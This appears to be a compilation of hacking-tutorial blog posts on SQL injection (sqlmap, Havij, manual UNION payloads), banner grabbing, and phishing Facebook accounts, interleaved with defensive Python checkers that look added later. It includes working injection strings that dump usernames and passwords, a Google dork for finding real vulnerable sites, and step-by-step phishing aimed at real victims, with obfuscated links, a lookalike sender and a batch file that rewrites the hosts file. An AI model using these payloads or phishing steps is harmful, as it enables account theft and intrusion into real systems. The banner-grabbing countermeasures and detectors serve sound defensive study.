Website hacking

Good evening, friends. Today we will see a step-by-step guide on how to create a web application pentest lab.

For creating this lab, I am using a host machine with Windows 7 installed on it. We also need the following software.

1. Wamp server (Download here)

2. Vulnerawa (Download here)

3. Vmware Workstation or Oracle Virtualbox (Download here)

4. Kali Linux (Download here)

Download the above software to your system and install Wamp server. For this WAPT lab, we will use Vulnerawa as the vulnerable (target) website. Extract the contents of vulnerawa.zip to the root folder of the Wamp server. Now open a browser and type localhost in the URL bar to check that you can see the victim web app as shown below.


Click on “Create Database” to create some data which we will use in our future how-tos.


Now let’s change the Wamp server’s access permissions so that it can be reached from our attacker machine. Go to Apache > httpd.conf as shown below.


You should see httpd.conf as shown below. Press CTRL+F and search for the word “stuff”. After you find it, make the changes shown in the red box below. Save the file with CTRL+S and restart the Wamp server.


Now install Kali Linux in Vmware Workstation or Oracle Virtualbox (see how). Set the network adapter to NAT. Now open the command line on your host machine and check the IP address assigned to it by typing the command “ipconfig”, as shown below. Since I am using Vmware Workstation, my network adapter is the Vmware network adapter vmnet8. The IP address assigned to my host machine is 192.168.64.1.


Now start your attacker machine (Kali Linux), open a browser and type the address 192.168.64.1 in the URL bar to check that you can access the victim web application as shown below.


Your web application pentest lab is ready. Happy hacking.

Hi friends. Today we will see how to perform SQL injection with sqlmap. Sqlmap is an “open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers”. It is pre-installed in Kali Linux. For this tutorial I am using Vulnerawa as the target, so it is necessary to set up a webapp pentest lab with it. See how to set up a webapp pentest lab.

Once the webapp pentest lab is ready, open the browser in Kali Linux and type the address as shown below (the IP address may differ for you). You should see the Vulnerawa web page as shown below. Click on “About”.


The web page below will open. It shows information about the founders of Vulnerawa.


Click on “Founder 1”. It will show brief details about him as shown below.


Similarly, go back and click on “Founder 2” and “Founder 3”. The result will be as below. If you have observed closely, the “id” parameter in the URL changes as we click on different users: for Founder 1 it is 1, and so on sequentially.


Now introduce a single quote (‘) character in the URL, after the number, as shown below.


Press Enter and the page will show an error, “You have an error……..”, as shown below. This is a clear sign that the web page is vulnerable to SQL injection.


Now open SQLmap from the path as shown below.


Now copy the vulnerable URL and type the following command in the terminal. Here -u stands for URL.


The result will be as shown below. It will reveal the website technology and the scripting language used.


Now let’s grab the banner of the website. Type the following command and hit “Enter”.


You can see the banner as shown below.


To see the current user of the website, type the following command.


The current user can be seen below.


Now let us see the current database used by the website. Type the following command.


We can see that the current database is “Vulneraw”.


Now let us see all the tables present in the database “Vulneraw” by using the following command.


We see that we have only one table in the current database. The table is “users”.


Now let’s see the number of columns in the table “users”. Type the following command.


We see there are four columns in table “users”.


Now let’s dump the values of two columns username and password by typing the following command.


The result is as below: we got the usernames and passwords.


If we want to dump all the entries of the table, type the following command.


Here are the entries.


Now let’s see if we are lucky enough to get a shell on the target. A shell is the target machine’s command line or terminal. Type the following command.


It will prompt us to enter the application language used by the website. We already know it is PHP; enter its value. Next it will prompt you to enter the writable directory. Choose your option wisely. I chose the default root directory of the Wamp server. Hit Enter.


I successfully got the os-shell. Now let’s try some commands. Type “dir” to see the contents of the root directory. It works as shown below.


Let’s see how many users there are on the system. Type the command “net user”. We can see the users listed below. Happy hacking practice.


To find sites vulnerable to this SQL injection, use the Google dork “site:.com inurl:id=1” or similar dorks.
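As an added example for defenders (not part of the original post), here is a small Python checker that runs over a few constructed Apache access-log lines and flags the probes this walkthrough produces: a stray single quote or UNION SELECT in the id parameter, and sqlmap's default User-Agent, which begins with `sqlmap/`. The IP addresses, paths and log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache "combined" log format (not real traffic).
SAMPLE_LOG = """\
192.168.64.128 - - [10/Oct/2014:20:01:02 +0530] "GET /about.php?id=1 HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
192.168.64.128 - - [10/Oct/2014:20:01:09 +0530] "GET /about.php?id=1' HTTP/1.1" 200 1611 "-" "Mozilla/5.0"
192.168.64.128 - - [10/Oct/2014:20:02:15 +0530] "GET /about.php?id=1%27%20AND%201%3D1 HTTP/1.1" 200 1532 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.64.128 - - [10/Oct/2014:20:02:16 +0530] "GET /about.php?id=-1%27%20UNION%20SELECT%20user%28%29%2C2--%20- HTTP/1.1" 200 1700 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
192.168.64.128 - - [10/Oct/2014:20:03:00 +0530] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# One combined-format line: client, identd, user, timestamp, request, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The probes shown above: a quote breaking out of a numeric parameter,
# a UNION SELECT, or the trailing "--" comment marker.
INJECTION_RE = re.compile(r"'|\bunion\s+select\b|--", re.IGNORECASE)


def analyse_line(line):
    """Return a list of findings for one log line; an empty list means it looks clean."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    findings = []
    # parse_qsl percent-decodes values, so %27 becomes a real quote before matching.
    for name, value in parse_qsl(urlsplit(m.group("target")).query, keep_blank_values=True):
        if INJECTION_RE.search(value):
            findings.append(f"suspicious value for parameter {name!r}: {value!r}")
    if m.group("ua").lower().startswith("sqlmap/"):
        findings.append(f"sqlmap user-agent: {m.group('ua')!r}")
    return findings


def scan_log(text):
    """Map 1-based line numbers of suspicious lines to their findings."""
    report = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        findings = analyse_line(line)
        if findings:
            report[lineno] = findings
    return report


if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG).items():
        print(lineno, findings)
```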


“When the time for the march of one’s enemy’s army has approached, one has to obstruct the enemy or send him far away, or make his movements fruitless, or, by false promise, cause him to delay the march, and then deceive him after the time for his march has passed away. One should ever be vigilant to increase one’s own resources and frustrate the attempts of one’s enemy to gain in strength.”

-Kautilya, Arthashastra.

Banner grabbing, or fingerprinting, is the method of gaining information about the target host: OS, web server type, version etc. Once the hacker gets the needed information about the target OS etc., he can easily find out the vulnerabilities present in that particular version and launch his attacks against it. Today we are going to see how web server banner grabbing is performed on web servers and how to apply countermeasures to it. We will see Apache and IIS 8 server examples in this article.

Apache:

Imagine I have set up a website named www.shunya.com on an Apache server. A hacker can easily find information about the web server in different ways. For example, a hacker can visit the website and try to open a web page which does not exist on my server, like below.


In the above example, the hacker tried to open a page named “admin.php” which was not available on my server, and in turn the server responded with the type of web server, the target OS and the scripting language. This is giving out too much information.

The traditional and popular way of fingerprinting is through telnet. A hacker opens a command line or terminal and types the command “telnet www.shunya.com 80”. When the screen goes black, type “HEAD / HTTP/1.0” and this will give the server information.


There are also many fingerprinting tools available. I am going to show you only one, ID Serve. Let’s see how to banner grab using ID Serve.


Now, what preventive measures can we take on an Apache server to disable, or at least limit, fingerprinting? The Apache web server has a configuration file called “httpd.conf” where we can make changes to fight fingerprinting. Go to httpd.conf and set the “ServerSignature” option to “Off”. This will not display any information about the server when a nonexistent page is accessed.


In the httpd.conf file, changing the value of “ServerTokens” from “Full” to “Prod” will show only the minimum server information, as shown below.


This still discloses that our web server is Apache, but it doesn’t show the version. In Kautilya’s words, this is delaying the march of the enemy. Here are the options we set.


IIS 8:

Now imagine we moved our www.shunya.com website from the Apache server to the latest version of the Microsoft web server, IIS 8. To prevent error pages from revealing any information on an IIS server, we can set custom error pages. Now let’s use the ID Serve tool to fingerprint the IIS 8 server.


It shows the server version. Now, how can we prevent this? Microsoft provides a tool named UrlScan, freely available for download, which can be used to process HTTP requests. Download this tool and install it (see how to configure UrlScan for IIS 7.5 and IIS 8). Then go to the configuration file of UrlScan, “UrlScan.ini”, located at “C:\Windows\System32\inetsrv\UrlScan” by default, and change the value of “RemoveServerHeader” from “0” to “1”.


This will not reveal the server version information as shown below.


We can further mislead the attacker by setting our server name to some value different from the original one. This can be done by setting the value of “RemoveServerHeader” to “0” and changing the value of “AlternateServerName” to the value we want to specify (in our example, Nginx).


So when the attacker tries to fingerprint our website, he will be misled.


Note: Taking these preventive measures will not stop a determined hacker from finding out our server information.

NOTE : This is strictly for educative purposes.
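The following Python check is an added example, not part of the original post: given a raw HTTP response it reports whether the Server or X-Powered-By headers, or the Apache ServerSignature footer in the body, still disclose a version or platform. The three sample responses are constructed to mirror the states described above (full tokens, ServerTokens Prod, and the header removed as UrlScan's RemoveServerHeader does); the version numbers in them are made up.

```python
import re

VERSION_RE = re.compile(r"\d+\.\d+(\.\d+)?")                     # e.g. 2.4.4
SIGNATURE_RE = re.compile(r"<address>(.*?)</address>", re.I | re.S)  # ServerSignature footer


def split_response(raw):
    """Return (status_line, {header-name-lowercased: value}, body) from a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def assess_disclosure(raw):
    """List what the response gives away; an empty list means no version/platform leak."""
    _, headers, body = split_response(raw)
    findings = []
    server = headers.get("server")
    if server is None:
        pass  # header suppressed entirely (IIS with RemoveServerHeader=1)
    elif VERSION_RE.search(server):
        findings.append(f"Server header discloses a version: {server!r}")
    elif "(" in server:
        findings.append(f"Server header discloses the platform: {server!r}")
    powered = headers.get("x-powered-by")
    if powered:
        findings.append(f"X-Powered-By discloses the scripting engine: {powered!r}")
    sig = SIGNATURE_RE.search(body)
    if sig and "server at" in sig.group(1).lower():
        findings.append(f"ServerSignature footer present: {sig.group(1).strip()!r}")
    return findings


# Constructed responses for the three states discussed above.
FULL_TOKENS = (
    "HTTP/1.1 404 Not Found\r\n"
    "Server: Apache/2.4.4 (Win64) PHP/5.4.12\r\n"
    "X-Powered-By: PHP/5.4.12\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<h1>Not Found</h1><hr><address>Apache/2.4.4 (Win64) Server at www.shunya.com Port 80</address>"
)
# ServerTokens Prod plus ServerSignature Off. X-Powered-By is omitted here because it is
# governed by PHP's expose_php setting, not by Apache's ServerTokens.
PROD_TOKENS = (
    "HTTP/1.1 404 Not Found\r\nServer: Apache\r\nContent-Type: text/html\r\n\r\n<h1>Not Found</h1>"
)
HEADER_REMOVED = "HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n\r\n<h1>Not Found</h1>"

if __name__ == "__main__":
    for label, raw in [("full", FULL_TOKENS), ("prod", PROD_TOKENS), ("removed", HEADER_REMOVED)]:
        print(label, assess_disclosure(raw) or "no disclosure")
```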


Havij is an automated SQL injection tool. To say in the own words of its creators,

“Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.”

It is available in both free and commercial versions. Today we are going to see how to dump the contents of a database using Havij. For this I am going to use the free version. First download Havij from here and install it. Then open it and enter the vulnerable page URL in the target column (for this tutorial I am using my own vulnerable web page).


Set the database option to ‘auto detect’ and hit Analyse. This should show you the current database name as shown below.


Click on the “info” tab. This will show you information about the victim’s system. We can see information like Host IP address, web server version etc.


Click on the “Tables” tab.


Click on “Get DBs” option. This will list all the databases as shown below.


To get the tables in a specific database, select the database and click on “Get Tables”. This will list all the tables present in the selected database. I selected the database “shunya” here.


We can see that there is one table, ‘users’, in our database ‘shunya’. To get the columns, select the table ‘users’ and click on “Get Columns”.


This will list all the columns in the table. We can see that we have five columns in the table ‘users’. It’s time to dump the values of the columns. Select the columns whose data we want to dump and click on “Get Data”. Here I selected all the columns.


We got all the data, including usernames and passwords. But the passwords seem to be encrypted. No problem. Click on the password hashes and copy them. Then click on the “MD5” tab and paste the password. Click on “Start”. Havij automatically decrypts the password for us. Decrypt all the passwords in a similar manner.


Click on “Find admin”. This option finds the admin page of the website automatically. When it finds the admin page, you can try the usernames and passwords to get access to the website. Hope this was helpful.


Here’s a video version of this howto.
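As an added, defender-side example (not from the original post or from Havij), the Python below shows why the “MD5” step above succeeds: an unsalted MD5 of a password is identical for every user who chose it and can be recovered by matching it against a table of precomputed digests, so it is not really “decrypted”. It then shows the storage scheme that resists this, salted and iterated PBKDF2-HMAC-SHA256 with a constant-time comparison on verify. The sample passwords and the iteration count are assumptions.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumption: raise until a verify costs a noticeable fraction of a second


def md5_store(password):
    """Unsalted MD5, as in the dumped 'users' table: the same password always yields the same digest."""
    return hashlib.md5(password.encode()).hexdigest()


def md5_lookup(digest, candidates):
    """Recover a password from an unsalted MD5 by matching against precomputed digests.

    MD5 is not reversed here; it is simply matched, which is all a 'decrypt' tab needs."""
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}
    return table.get(digest)


def pbkdf2_store(password, salt=None):
    """Salted, iterated hash; returns a self-describing record 'pbkdf2_sha256$iters$salt$hash'."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def pbkdf2_verify(record, password):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_b64, dk_b64 = record.split("$")
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    salt, expected = base64.b64decode(salt_b64), base64.b64decode(dk_b64)
    got = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    return hmac.compare_digest(got, expected)


if __name__ == "__main__":
    # Constructed sample: two users who chose the same weak password.
    weak = md5_store("letmein")
    print("same MD5 for both users:", weak == md5_store("letmein"))
    print("recovered from table:", md5_lookup(weak, ["123456", "password", "letmein"]))
    rec_a, rec_b = pbkdf2_store("letmein"), pbkdf2_store("letmein")
    print("PBKDF2 records differ:", rec_a != rec_b, "verify:", pbkdf2_verify(rec_a, "letmein"))
```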


There are many articles on the internet on SQL injection, but most of them only give you queries and don’t display the ensuing result. So here I have made a minuscule attempt to explain SQL injection for beginners. For this, I have made my own web page vulnerable to SQL injection and hosted it on a Wamp server. I hope this will be helpful for beginners to understand SQL injection.

Imagine a hacker searching for SQL-vulnerable sites using Google dorks comes to the website shown below.


The above is a web page displaying some information about the company’s founders. What happens when we click on “Founder 1”? It displays some information about Founder 1 as shown below.


Notice that there is a small change in the URL: it says id=1 at the end. Now if we go back and click on “Founder 2”, it displays information about Founder 2 and the URL changes to ‘id=2’. This implies that the web page is using a PHP $_GET parameter to fetch data from the database.


Well, let’s see if the web page is vulnerable. In the address bar, add a single quote after the id=1, like below:

id=1'


If you get an error as shown above, then the site is vulnerable to SQL injection. Since we know this site is vulnerable, let’s see the number of columns in the database. Use the query

id=1 order by 1

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value that does not give an error is the number of columns present. The ‘order by’ clause in SQL is used to sort the data; when no option is specified it sorts in ascending order by default. Sometimes you may not see any error no matter how much you increase the value, as in the case below where I did not receive an error even at the value 15.


Maybe there are fifteen columns ( the chances are very low though) or our query is not working. Let’s use another query.

id=1' order by 1--+

We can see below that the value 3 returns an error. This means there are two columns.


If the latter query works, then you should use that form all through the injection. The characters ‘--’ comment out the code after them.

Now we know there are two columns. Let’s find out the vulnerable columns in the website. Type

id=-1' union select 1,2--+

The vulnerable columns are displayed as below. Here both the columns are vulnerable but you may not be so lucky all the time.


If the above query doesn’t work, use

id=1' and 1=2 union select 1,2--+


Now let’s find out the database version. We already know the number of columns. Use query,

id=-1' union select version(),2--+


The version is 5.6.2-log. Now let’s find out the names of all the databases present. Use the query,

id=-1' union select group_concat(schema_name),2 from information_schema.schemata--+

This will display all the databases. You can see the list of databases present below, including the dvwa database which I used earlier for practice.


We know all the databases. Now let’s see the database being used by our website. Use the query,

id=-1' union select database(),2--+


So, Shunya is the database being used by our website. Let’s see the current user.

id=-1' union select user(),2--+


We know root is the default user on a Wamp server. Now let’s find out the tables present in the ‘shunya’ database.

id=-1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+


The table name is ‘users’. Now let’s find out the column names in the table ‘users’.

id=-1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database()--+


We got the column names. Now let’s dump the values of some interesting columns. Let’s dump “username” and “password” values.

id=-1' union select group_concat(username,0x3a,password,0x3a),2 from users--+


We successfully dumped the usernames and passwords. The value 0x3a introduces a colon between the dumped values for readability. Now let’s dump all the values from the table ‘users’.

id=-1' union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password,0x3a),2 from users--+


We have successfully performed sql injection and dumped the values. Hope this was helpful.

Note: This is for educative purposes only.
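As an added example (not the author's code), here the same id= probes used above are run against a vulnerable query and against its parameterised fix. The post's target is PHP/MySQL; an in-memory SQLite ‘users’ table with the column names from the post (id, name, field, username, password) and constructed rows stands in, so it runs offline. SQLite's comment marker is also `--`, but it has no `version()`, so the UNION probe dumps the table instead.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the post's 'users' table, with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users(id INTEGER, name TEXT, field TEXT, username TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [(1, "Founder 1", "CEO", "founder1", "s3cret1"), (2, "Founder 2", "CTO", "founder2", "s3cret2")],
    )
    return con


def founder_vulnerable(con, id_param):
    """Mirrors the post's PHP: the raw id parameter is pasted into the SQL text."""
    sql = f"SELECT name, field FROM users WHERE id='{id_param}'"
    return con.execute(sql).fetchall()


def founder_safe(con, id_param):
    """Parameterised fix: the value travels separately from the SQL, so it can only ever be a value."""
    return con.execute("SELECT name, field FROM users WHERE id=?", (id_param,)).fetchall()


def raises_db_error(query_fn, con, id_param):
    """True if the query fails on this input: the post's 'an error means vulnerable' sign."""
    try:
        query_fn(con, id_param)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    con = make_db()
    # Column-count probe from the post: ORDER BY 3 errors because the query has 2 columns.
    print("order by 2 errors:", raises_db_error(founder_vulnerable, con, "1' order by 2-- "))
    print("order by 3 errors:", raises_db_error(founder_vulnerable, con, "1' order by 3-- "))
    # UNION probe: the vulnerable query returns rows the page never meant to show.
    print(founder_vulnerable(con, "-1' union select username, password from users-- "))
    # The same inputs against the parameterised query: no error and no extra rows.
    print(founder_safe(con, "1' order by 3-- "), founder_safe(con, "1"))
```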

Have you ever read “Life on Earth” by David Attenborough? It’s a very nice book about the evolution of animals. What is evolution? Wikipedia defines it as the “change in the inherited characteristics of biological populations over successive generations”. Why are we talking about evolution now? Because personally I feel desktop phishing is an evolution over phishing. It evolved to overcome the disadvantages of phishing. Let’s see how.

The process in desktop phishing is the same as in phishing. The only difference is in the method of uploading our phishing files. Whereas in phishing we upload our files to an external server, in desktop phishing we upload our files to a server on our desktop. Why? Because there are three disadvantages in the former method.

One, however hard we may try, the URL always looks suspicious.


Two, modern-day browsers are capable of detecting phishing sites.


Three, as soon as the web hosting provider detects that you hosted a phishing site, he will suspend your account. This will most likely happen within 24 hours. Desktop phishing overcomes all these defects. So now, let’s see how to hack a Facebook account with desktop phishing. As already told, this process is the same as phishing until the creation of the phishing files, which you can find here. Now install Wamp Server on your Windows machine. To see what Wamp server is and how to install it, click here. Next, install a VPN on your system to keep your IP static. See here. We are going to host our phishing files on our desktop and redirect the victim to our site.

Now copy our phishing files to the folder C:/wamp/www. This is the root directory of the Wamp server.


Here is the script of the “phish.php” we used.


Go to the folder “C:/wamp/bin/apache/Apache 2.4.4/conf” and make changes to the ‘httpd.conf’ file as below. These changes give external users permission to access your fake website.


Start your Wamp server, open your browser and type “localhost” in the URL bar to see if your phishing site is working. Then open Notepad and create a batch file as shown below. We need to send this file to the victim machine and make him execute it. See how? Make sure you replace the IP address below with the one assigned by the VPN.


The above script changes the hosts file on the victim’s system so that the user is redirected to your fake website when he tries to access Facebook. Now, what is the hosts file?

The hosts file is a text file located in the folder “C:/windows/system32/drivers/etc” which maps domain names to IP addresses.


Usually when we try to visit any website, say www.google.com, our system sends a query for its IP address to the DNS server. When there is an entry for it in the hosts file of our computer, the query is not sent to the DNS server. When the victim clicks on the executable sent by us, it changes the hosts file like below.


Now when the victim types “www.facebook.com” in his browser, he is redirected to our Wamp server. Notice that the URL looks completely genuine and the browser didn’t detect it as a phishing site.


When the unsuspecting victim enters his credentials, a text file called pass.txt is created in the www directory.


Open the file and we can see the credentials.

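As an added, defender-side example (not part of the original post), this Python script reads hosts-file text and reports any entry that points a watched domain somewhere other than loopback, which is exactly what the batch file above leaves behind on the victim machine. The sample hosts content, the watched-domain list and the 203.0.113.10 address are constructed.

```python
import ipaddress

# Assumption: the domains whose resolution we care about (the post's example is Facebook).
WATCHED_DOMAINS = {"facebook.com"}

# Constructed sample hosts-file content, in the format used on Windows and Unix.
SAMPLE_HOSTS = """\
# localhost name resolution
127.0.0.1       localhost
::1             localhost
# an entry of the kind the batch file above appends
203.0.113.10    www.facebook.com facebook.com
127.0.0.1       telemetry.example.net   # a harmless local block
"""


def parse_hosts(text):
    """Yield (lineno, ip_address, [hostnames]) for every usable line; comments and junk are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # not a valid address: ignore the line
        yield lineno, ip, fields[1:]


def is_watched(hostname):
    """True for a watched domain or any of its subdomains."""
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in WATCHED_DOMAINS)


def hijacked_entries(text):
    """Return (lineno, ip, hostname) for watched names mapped to a non-local address."""
    hits = []
    for lineno, ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue  # 127.0.0.0/8, ::1 and the 0.0.0.0 blocking convention are benign
        for name in names:
            if is_watched(name):
                hits.append((lineno, str(ip), name.lower()))
    return hits


if __name__ == "__main__":
    for lineno, ip, name in hijacked_entries(SAMPLE_HOSTS):
        print(f"line {lineno}: {name} -> {ip}")
```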

“Whoever, fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh.”

Information Technology Act 2008

Yes, that’s what the law in India says about identity theft. Then why make this tutorial? Well, let me make this very clear that this is only for educative purposes and I will not be held responsible for any action coming out of this article. To take a line from the movie Mission Impossible 2, “to create Bellerophon we always create Chimera.” I hope this article will be more helpful than the other articles available about phishing on the internet.

What is phishing? Phishing is the act of presenting a fake page resembling the original web page you intend to visit, with the sole intention of stealing your credentials. Although this article explains how to hack a Facebook account via phishing, this method can be used to phish any website. Phishing is the most popular method of hacking a Facebook account. So now let’s phish.

In your browser, open the Facebook website. Right-click on the web page and click on “View page source”.


The source of the page is displayed in the browser. Right-click on the page and click on “Save As”. Save the page as “index.html” on your computer.


Now open index.html using Notepad and hit “CTRL+F”. In the Find box that opens, type “action” and click on “Find Next”. Look at the value of action.


Now change the value of action to “phish.php”. We are doing this so that when the user enters his credentials, the page that loads will be “phish.php” and not the page Facebook wants.


Now let’s create the page phish.php. Open Notepad, type the following script into it and save it as “phish.php”. This script logs the user’s credentials and saves them to a file named “pass.txt”.


Now our files are ready. The next step is to upload these files to any free web hosting site available on the internet. Google for free web hosting sites, select any one of them (I selected bytehost7), create an account with a username as close to Facebook as possible, and delete the index.html file available in the htdocs folder. Then, using Online File Management, upload your own index.html and phish.php files to the htdocs folder. Your htdocs folder will look like below.


Let’s check if our phishing page is ready by typing the address of our site. If the page looks like below, then our phishing page is working.


The next thing we have to do is send the address of our fake website to the victim. We will do this by sending him an email, but in order for the victim not to smell something fishy, we will obfuscate the URL of the fake page we are about to send him. The sending email address should be as convincingly close to Facebook as possible.


When the victim clicks on the obfuscated URL, it will bring him to our fake site.


If the victim is not cautious enough to observe the URL and enters his username and password, our attempt is a success. To show this, I will enter random values in both the username field and the password field and hit Enter.


Now a text file with the name pass.txt will be created in the htdocs folder, containing both the username and the password.


Click on the file. We can see both the email and the password I entered. The email is “don’t get hacked” and the password is “like me”.


Find it difficult? See how to do phishing with Weeman HTTP server

Counter Point:

If you don’t want to fall victim to phishing, you can take a few precautions. If you want to open a site, type the address directly in the URL bar and don’t open any redirected links. Don’t click on any emails which look malicious, such as those asking for your login credentials.
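As an added example for the counter point above (not part of the original post), this Python script parses a saved login page with the standard library's html.parser and lists every form that would post credentials to a host other than the one the page claims to be. Run on the two constructed snippets below, it passes the genuine page and flags the copy whose action was changed to phish.php. The page URLs, the hosting address and the HTML are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect the action attribute of every <form> on the page."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_targets(html, page_url):
    """Absolute URL each form posts to; an empty action means 'this page', as browsers resolve it."""
    collector = FormCollector()
    collector.feed(html)
    return [urljoin(page_url, action) for action in collector.actions]


def foreign_form_targets(html, page_url, expected_domain):
    """Forms whose target host is neither expected_domain nor one of its subdomains."""
    expected = expected_domain.lower()
    flagged = []
    for target in form_targets(html, page_url):
        host = (urlsplit(target).hostname or "").lower()
        if host != expected and not host.endswith("." + expected):
            flagged.append(target)
    return flagged


# Constructed snippets: the genuine page, and a copy whose action was pointed at phish.php.
GENUINE_HTML = (
    '<form id="login" action="/login.php" method="post">'
    '<input name="email"><input name="pass" type="password"></form>'
)
COPIED_HTML = (
    '<form id="login" action="phish.php" method="post">'
    '<input name="email"><input name="pass" type="password"></form>'
)
GENUINE_URL = "https://www.facebook.com/"
COPY_URL = "http://www-facebook-login.example.net/"  # constructed hosting address, not a real site

if __name__ == "__main__":
    print("genuine:", foreign_form_targets(GENUINE_HTML, GENUINE_URL, "facebook.com"))
    print("copy:", foreign_form_targets(COPIED_HTML, COPY_URL, "facebook.com"))
```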